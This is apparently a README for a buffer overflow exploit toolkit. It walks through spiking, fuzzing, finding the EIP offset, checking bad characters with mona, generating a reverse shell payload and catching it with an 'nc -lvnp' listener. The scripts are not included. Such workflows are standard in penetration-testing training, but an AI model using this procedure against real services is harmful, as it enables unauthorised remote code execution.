Edit spiking.spk with the command you want to spike
bash spiking.sh <ip> <port>
Inside python fuzzing.py Edit:
1. ip
2. port
3. command
python fuzzing.py
Keep the program crash output byte size
bash pattern.sh <byte size>
copy the pattern and paste in offset.py and change the ip port & command.
python offset.py
bash offset_value.sh
Keep the program output _actual size
Inside overWriteEIP.py Edit:
1. Actual value
2. ip
3. port
4. command
python overWriteEIP.py
Inside badchar.py Edit:
1. Actual value
2. ip
3. port
4. command
python badchar.py
right click on ESP register vlaue and follow in dump and check for bad characters
!mona module " "
bash rev_shell.sh
Keep the output payload
Inside final.py Edit:
1. Payload
2. Actual value
3. ip
4. port
5. command
Now Start netcat :
nc -lvnp
And Finally run:
python final.py